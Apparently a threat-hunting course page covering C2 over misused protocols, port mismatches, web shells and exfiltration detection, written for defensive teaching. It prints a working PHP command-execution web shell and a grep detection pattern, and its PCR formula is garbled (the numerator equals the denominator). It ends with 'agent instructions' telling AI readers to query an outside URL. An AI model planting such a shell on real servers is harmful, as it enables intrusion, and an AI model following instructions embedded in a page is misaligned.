# Hunting for irregular traffic #### **Irregularities in network traffic are useful indicators for threat hunters** Malware authors use a variety of techniques to hide C2 traffic * Missused protocols * Port-application mismatches Attackers also scan for and use web shells as an initial infection vector ## Misused protocols Common protocols are often misused for C2 since they are less likely to be detected and blocked * Most organizations allow DNS, HTTP, etc across network boundaries Identification of protocol misuse requires knowledge of where data can be hidden in these protocols * DNS domains, HTTP header fields, etc Detecting this type of C2 requires comparing traffic to the norm and investigating anomalies * "Rinse and repeat" works for more than just DNS! ## Port-application mismatches Port numbers are in the range 0-65535 * 0-1023: System ports * 1024-49151: User port or registered ports * 49152-65535: Dynamic or private ports Malware authors may use common (HTTPS, DNS, etc) or custom protocols for C2 Malware may mix and match common/uncommon ports and common/custom protocols * Common Protocol + Common Port * Common Protocol + Uncommon Port * Custom Protocol + Common Port * Custom Protocol + Uncommon Port Look at log data (firewall, proxy, webserver and application) to find anomalies ## Web shells Web shells are an undocumented way to gain console access to a computer through a dynamic server-side webpage Traditionally, these web shells were simple and easy to detect Sophisticated web shells include methods to interact with the console, edit file, etc. * The C99 shell (almost a decade old) has several features: * SQL Manager * Visual File Manager (many features) * PHP Eval * Mail Bomber * Get all readable home directories ### Example ```php if(isset($_REQUEST['cmd'])){ echo " "; $cmd = ($_REQUEST['cmd']); system($cmd); echo " "; die; } ?> ``` This shell is straightforward and allows an attacker to simply enter a URL such as the fabricated example below to execute commands: * ### Detecting unencrypted web shells Shells such as C99 can be detected by using keyword searches or using a signature-based detection tool The following statement (adapted from Steven Whitney) can be used to detect a PHP backdoor: * `grep -RPn` * `"(system|phpinfo|pcntl_exec|python_eval|base64_decode|gzip|mkdir|fopen|fclose|readile|passthru)"/pathto/webdir/` This would generate a huge number of false positives, as many of these calls are used be legitimate web applications ### Detecting customized web shells Some web shells, like the one generated with Weevely, have implemented mechanisms specifically aimed at avoiding signature detection * Uses compression and encryption for obfuscation Finding web shells on enterprise web servers can be difficult due to the sheer volume of data Tools exist to hekp detecting customized web shells: * Part of threat hunting suites or vulnerability scaners (Nessus) * Standalone tools (Webshell Scan, Scalp, NeoPI) ## Data exfiltration Data exfiltration events are complex Most involve transport nodes (not sources) Overt and covert channels may be involved: * IP multicasting * Browser-based (e.g., DNS prefetching) * Tunneling: DNS, HTTP, XXX * Piggyback transporting (NTPv3, ICMP, etc) **Data Loss Protection (DLP)** solutions may miss exfiltration events: * Exfiltration exploits are often steppingstones and not always affect DLP-protected data * Distributed exploitation networks are hard for DLP to detect ### Product-Consumer Ratio (PCR) One way to hunt for exfiltration is by detecting the shift in producer/consumer roles of a network node #### **Product-Consumer Ratio (PCR)** * First introduced by Carter Bullard and John Gerth * All nodes are producers and consumers of data * The ratio of produced versus consumed data (PCR) is consistent $$ PCR = \frac{SrcApplicationBytes - DstApplicationBytes}{SrcApplicationBytes - DstApplicationBytes} $$ Where *ApplicationBytes = (TotalBytes - Sum(L\[2,3,4] Headers)) - RetransBytes* Example: DNS could be an exfiltration channel. An increase in PCR for DNS may be an indicator of exfiltration ## Additional resources The following resources on the Skills portal show some network-based threat hunting tools and analysis methods #### Cyber threat hunting * Cyber-threat hunting - Hunting network-based threats * Cyber-threat hunting - Finding threats in .pcap files * Cyber-threat hunting - Detecting a port scan #### Network traffic analysis --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://davidjosearaujo.gitbook.io/online-courses/cyber-threat-hunting/hunting-for-network-based-threats/hunting-for-irregular-traffic.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.